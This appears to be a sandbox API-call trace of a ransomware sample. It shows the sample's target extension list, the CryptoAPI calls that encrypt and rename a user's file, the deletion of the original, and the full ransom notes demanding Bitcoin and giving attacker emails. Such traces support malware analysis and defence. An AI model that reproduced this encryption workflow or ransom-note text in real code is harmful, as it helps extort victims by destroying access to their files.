b.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".wav") returned=".wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0191.137] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0191.137] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0191.138] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\v-rzbut.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\v-rzbut.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0191.143] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x13b23, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x13b23, lpOverlapped=0x0) returned 1
	[0191.491] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.491] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb5d8) returned 1
	[0191.493] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.493] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0191.494] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.494] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0191.494] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.494] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb9070) returned 1
	[0191.494] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.494] CryptEncrypt (in: hKey=0xfb9070, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x13b23, dwBufLen=0x13b23 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x13b30) returned 1
	[0191.497] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0191.497] RtlMoveMemory (in: Destination=0xff0cb0, Source=0xfdd180, Length=0x13b23 | out: Destination=0xff0cb0) 
	[0191.497] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.497] CryptEncrypt (in: hKey=0xfb9070, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff0cb0*, pdwDataLen=0x18aefc*=0x13b23, dwBufLen=0x13b30 | out: pbData=0xff0cb0*, pdwDataLen=0x18aefc*=0x13b30) returned 1
	[0191.498] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.498] CryptDestroyKey (hKey=0xfb9070) returned 1
	[0191.498] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.498] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0191.498] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.498] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0191.498] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0191.499] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0191.499] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.499] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0191.535] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\v-rzbut.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 92
	[0191.536] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\v-rzbut.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\v-rzbut.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0191.536] WriteFile (in: hFile=0x388, lpBuffer=0xff0cb0*, nNumberOfBytesToWrite=0x13b30, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xff0cb0*, lpNumberOfBytesWritten=0x18b358*=0x13b30, lpOverlapped=0x0) returned 1
	[0191.543] CloseHandle (hObject=0x388) returned 1
	[0191.543] CloseHandle (hObject=0x2c0) returned 1
	[0191.543] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\v-rzbut.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\v-rzbut.wav")) returned 1
	[0191.552] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\v-rzbut.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\v-rzbut.wav")) returned 0
	[0191.552] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3101dba0, ftCreationTime.dwHighDateTime=0x1d96f5c, ftLastAccessTime.dwLowDateTime=0x9e9cc9c0, ftLastAccessTime.dwHighDateTime=0x1d96f81, ftLastWriteTime.dwLowDateTime=0x9e9cc9c0, ftLastWriteTime.dwHighDateTime=0x1d96f81, nFileSizeHigh=0x0, nFileSizeLow=0x13b23, dwReserved0=0x0, dwReserved1=0x0, cFileName="v-rZbut.wav", cAlternateFileName="")) returned 0
	[0191.553] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0191.553] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0191.553] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF"
	[0191.553] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\*.*"
	[0191.553] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0191.554] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0191.554] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HELP_DECRYPT_YOUR_FILES.TXT") returned 66
	[0191.554] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0191.555] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0191.555] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0191.558] CloseHandle (hObject=0x384) returned 1
	[0191.558] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0191.558] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.559] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0191.560] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0191.560] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0191.560] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0191.560] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0191.560] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0191.561] CloseHandle (hObject=0x384) returned 1
	[0191.561] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0191.561] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0191.561] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0191.562] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HELP_DECRYPT_YOUR_FILES.HTML") returned 67
	[0191.562] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0191.562] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0191.562] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0191.566] CloseHandle (hObject=0x384) returned 1
	[0191.566] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0191.566] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0191.567] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.567] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
